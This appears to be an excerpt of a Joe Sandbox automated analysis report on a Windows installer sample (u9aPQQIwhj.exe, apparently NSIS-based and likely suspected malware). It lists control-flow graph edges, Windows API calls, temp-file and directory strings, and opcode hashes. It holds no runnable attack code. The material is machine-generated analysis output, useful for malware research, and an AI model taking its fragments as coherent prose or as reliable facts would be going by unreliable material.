272->273 280 403ea6-403ef3 call 405f0a call 40412d * 3 GetDlgItem 272->280 273->265 274->264 276 403d28-403d2b 275->276 277 403d0b-403d22 SendMessageW IsWindowEnabled 275->277 281 403d30-403d33 276->281 282 403d2d-403d2e 276->282 277->256 277->276 279->256 308 403ef5-403efa 280->308 309 403efd-403f39 ShowWindow KiUserCallbackDispatcher call 40414f EnableWindow 280->309 286 403d41-403d46 281->286 287 403d35-403d3b 281->287 285 403d5e-403d63 call 404106 282->285 285->274 289 403d7c-403d8f SendMessageW 286->289 291 403d48-403d4e 286->291 287->289 290 403d3d-403d3f 287->290 289->274 290->285 294 403d50-403d56 call 40140b 291->294 295 403d65-403d6e call 40140b 291->295 306 403d5c 294->306 295->274 304 403d70-403d7a 295->304 304->306 306->285 308->309 312 403f3b-403f3c 309->312 313 403f3e 309->313 314 403f40-403f6e GetSystemMenu EnableMenuItem SendMessageW 312->314 313->314 315 403f70-403f81 SendMessageW 314->315 316 403f83 314->316 317 403f89-403fc7 call 404162 call 405ee8 lstrlenW call 405f0a SetWindowTextW call 401389 315->317 316->317 317->257 326 403fcd-403fcf 317->326 326->257 327 403fd5-403fd9 326->327 328 403ff8-40400c DestroyWindow 327->328 329 403fdb-403fe1 327->329 328->265 331 404012-40403f CreateDialogParamW 328->331 329->256 330 403fe7-403fed 329->330 330->257 332 403ff3 330->332 331->265 333 404045-40409c call 40412d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 331->333 332->256 333->256 338 40409e-4040b1 ShowWindow call 404179 333->338 340 4040b6 338->340 340->265
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                                                  • ShowWindow.USER32(?), ref: 00403CAE
                                                  • DestroyWindow.USER32 ref: 00403CC2
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                                                  • GetDlgItem.USER32(?,?), ref: 00403CFF
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                                                  • GetDlgItem.USER32(?,?), ref: 00403DC8
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E3D
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F04
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
                                                  • EnableWindow.USER32(?,?), ref: 00403F31
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F47
                                                  • EnableMenuItem.USER32(00000000), ref: 00403F4E
                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F66
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                                                  • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                                                  • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                                                  • ShowWindow.USER32(?,0000000A), ref: 004040EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID:
                                                  • API String ID: 3282139019-0
                                                  • Opcode ID: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
                                                  • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                                                  • Opcode Fuzzy Hash: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
                                                  • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 341 402dba-402e08 GetTickCount GetModuleFileNameW call 405b54 344 402e14-402e42 call 405ee8 call 40597f call 405ee8 GetFileSize 341->344 345 402e0a-402e0f 341->345 353 402f32-402f40 call 402d18 344->353 354 402e48-402e5f 344->354 346 403059-40305d 345->346 361 403011-403016 353->361 362 402f46-402f49 353->362 355 402e61 354->355 356 402e63-402e70 call 4032f7 354->356 355->356 363 402e76-402e7c 356->363 364 402fcd-402fd5 call 402d18 356->364 361->346 365 402f75-402fc1 GlobalAlloc call 40636e call 405b83 CreateFileW 362->365 366 402f4b-402f63 call 40330d call 4032f7 362->366 367 402efc-402f00 363->367 368 402e7e-402e96 call 405b0f 363->368 364->361 392 402fc3-402fc8 365->392 393 402fd7-403007 call 40330d call 403060 365->393 366->361 389 402f69-402f6f 366->389 373 402f02-402f08 call 402d18 367->373 374 402f09-402f0f 367->374 368->374 387 402e98-402e9f 368->387 373->374 380 402f11-402f1f call 406300 374->380 381 402f22-402f2c 374->381 380->381 381->353 381->354 387->374 391 402ea1-402ea8 387->391 389->361 389->365 391->374 394 402eaa-402eb1 391->394 392->346 400 40300c-40300f 393->400 394->374 396 402eb3-402eba 394->396 396->374 399 402ebc-402edc 396->399 399->361 401 402ee2-402ee6 399->401 400->361 402 403018-403029 400->402 403 402ee8-402eec 401->403 404 402eee-402ef6 401->404 406 403031-403036 402->406 407 40302b 402->407 403->353 403->404 404->374 405 402ef8-402efa 404->405 405->374 408 403037-40303d 406->408 407->406 408->408 409 40303f-403057 call 405b0f 408->409 409->346
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402DCE
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\u9aPQQIwhj.exe,00000400), ref: 00402DEA
                                                    • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00405B58
                                                    • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\u9aPQQIwhj.exe,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00402E33
                                                  • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\u9aPQQIwhj.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\u9aPQQIwhj.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-1320270146
                                                  • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                  • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                                                  • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                  • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C
                                                  APIs
                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,?), ref: 10001225
                                                    • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
                                                    • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C4A
                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 10001C92
                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 10001C9C
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001CAF
                                                  • GlobalFree.KERNEL32(?), ref: 10001DA9
                                                  • GlobalFree.KERNEL32(?), ref: 10001DAE
                                                  • GlobalFree.KERNEL32(?), ref: 10001DB3
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001F57
                                                  • lstrcpyW.KERNEL32(?,?), ref: 100020BB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                  • String ID:
                                                  • API String ID: 4227406936-0
                                                  • Opcode ID: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
                                                  • Instruction ID: 71c1a880e39e69f42b548688fcbdb76c41956fc1357523659d9e12ead3b80716
                                                  • Opcode Fuzzy Hash: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
                                                  • Instruction Fuzzy Hash: F9127A75D0064ADBEB20CFA4C8846EEB7F4FF083D5F21452AE5A5E3288D7749A81DB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 803 405192-4051a7 804 4051ad-4051be 803->804 805 40525e-405262 803->805 806 4051c0-4051c4 call 405f0a 804->806 807 4051c9-4051d5 lstrlenW 804->807 806->807 809 4051f2-4051f6 807->809 810 4051d7-4051e7 lstrlenW 807->810 812 405205-405209 809->812 813 4051f8-4051ff SetWindowTextW 809->813 810->805 811 4051e9-4051ed lstrcatW 810->811 811->809 814 40520b-40524d SendMessageW * 3 812->814 815 40524f-405251 812->815 813->812 814->815 815->805 816 405253-405256 815->816 816->805
                                                  APIs
                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll), ref: 004051FF
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll
                                                  • API String ID: 2531174081-1401546287
                                                  • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                  • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                                                  • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                  • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 817 40317b-4031a4 GetTickCount 818 4032e5-4032ed call 402d18 817->818 819 4031aa-4031d5 call 40330d SetFilePointer 817->819 825 4032ef-4032f4 818->825 824 4031da-4031ec 819->824 826 4031f0-4031fe call 4032f7 824->826 827 4031ee 824->827 830 403204-403210 826->830 831 4032d7-4032da 826->831 827->826 832 403216-40321c 830->832 831->825 833 403247-403263 call 40638e 832->833 834 40321e-403224 832->834 840 4032e0 833->840 841 403265-40326d 833->841 834->833 835 403226-403246 call 402d18 834->835 835->833 842 4032e2-4032e3 840->842 843 4032a1-4032a7 841->843 844 40326f-403285 WriteFile 841->844 842->825 843->840 847 4032a9-4032ab 843->847 845 403287-40328b 844->845 846 4032dc-4032de 844->846 845->846 848 40328d-403299 845->848 846->842 847->840 849 4032ad-4032c0 847->849 848->832 850 40329f 848->850 849->824 851 4032c6-4032d5 SetFilePointer 849->851 850->849 851->818
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403190
                                                    • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                                                  • WriteFile.KERNELBASE(0040BE78,00410B11,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                                                  • SetFilePointer.KERNELBASE(00006EF9,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$CountTickWrite
                                                  • String ID: x>A
                                                  • API String ID: 2146148272-3854404225
                                                  • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                  • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                                                  • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                  • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 852 40232f-402375 call 402c2d call 402b38 * 2 RegCreateKeyExW 859 4029c5-4029d4 852->859 860 40237b-402383 852->860 862 402385-402392 call 402b38 lstrlenW 860->862 863 402396-402399 860->863 862->863 866 4023a9-4023ac 863->866 867 40239b-4023a8 call 402b1b 863->867 869 4023bd-4023d1 RegSetValueExW 866->869 870 4023ae-4023b8 call 403060 866->870 867->866 874 4023d3 869->874 875 4023d6-4024b0 RegCloseKey 869->875 870->869 874->875 875->859 877 402791-402798 875->877 877->859
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh4048.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsh4048.tmp
                                                  • API String ID: 1356686001-414440043
                                                  • Opcode ID: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
                                                  • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                                                  • Opcode Fuzzy Hash: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
                                                  • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 878 4015b9-4015cd call 402b38 call 4059de 883 401614-401617 878->883 884 4015cf-4015eb call 405960 CreateDirectoryW 878->884 886 401646-402195 call 401423 883->886 887 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 883->887 891 40160a-401612 884->891 892 4015ed-4015f8 GetLastError 884->892 899 4029c5-4029d4 886->899 887->899 902 40163e-401641 887->902 891->883 891->884 896 401607 892->896 897 4015fa-401605 GetFileAttributesW 892->897 896->891 897->891 897->896 902->899
                                                  APIs
                                                    • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 004059EC
                                                    • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                    • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\Uploadable\normallnnens\Trskelen,?,00000000,000000F0), ref: 00401630
                                                  Strings
                                                  • C:\Users\user\Uploadable\normallnnens\Trskelen, xrefs: 00401623
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                  • String ID: C:\Users\user\Uploadable\normallnnens\Trskelen
                                                  • API String ID: 3751793516-936114887
                                                  • Opcode ID: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
                                                  • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                                                  • Opcode Fuzzy Hash: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
                                                  • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 904 10001771-100017ad call 10001b3e 908 100017b3-100017b7 904->908 909 100018be-100018c0 904->909 910 100017c0-100017cd call 100022eb 908->910 911 100017b9-100017bf call 100022a1 908->911 916 100017fd-10001804 910->916 917 100017cf-100017d4 910->917 911->910 918 10001824-10001828 916->918 919 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 916->919 920 100017d6-100017d7 917->920 921 100017ef-100017f2 917->921 922 10001866-1000186c call 1000248d 918->922 923 1000182a-10001864 call 100015cc call 1000248d 918->923 944 1000186d-10001871 919->944 926 100017d9-100017da 920->926 927 100017df-100017e0 call 10002870 920->927 921->916 924 100017f4-100017f5 call 10002b2b 921->924 922->944 923->944 937 100017fa 924->937 932 100017e7-100017ed call 10002614 926->932 933 100017dc-100017dd 926->933 940 100017e5 927->940 943 100017fc 932->943 933->916 933->927 937->943 940->937 943->916 947 10001873-10001881 call 10002450 944->947 948 100018ae-100018b5 944->948 954 10001883-10001886 947->954 955 10001899-100018a0 947->955 948->909 950 100018b7-100018b8 GlobalFree 948->950 950->909 954->955 957 10001888-10001890 954->957 955->948 956 100018a2-100018ad call 10001555 955->956 956->948 957->955 959 10001892-10001893 FreeLibrary 957->959 959->955
                                                  APIs
                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                    • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                  • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                  • FreeLibrary.KERNEL32(?), ref: 10001893
                                                  • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                    • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,004050A3), ref: 100022D3
                                                    • Part of subcall function 10002614: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 10002686
                                                    • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                    • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                    • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002562
                                                    • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 1000258B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                  • String ID:
                                                  • API String ID: 1767494692-3916222277
                                                  • Opcode ID: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
                                                  • Instruction ID: f1aa1b9103b0a65f35aec93e8e69466a872eebdec6ee13635525f9d4203f99a4
                                                  • Opcode Fuzzy Hash: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
                                                  • Instruction Fuzzy Hash: 9931BF799042459AFB10DF74DCC5BDA37E8EB043D4F058529FA0AAA08EDF74A985C760

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
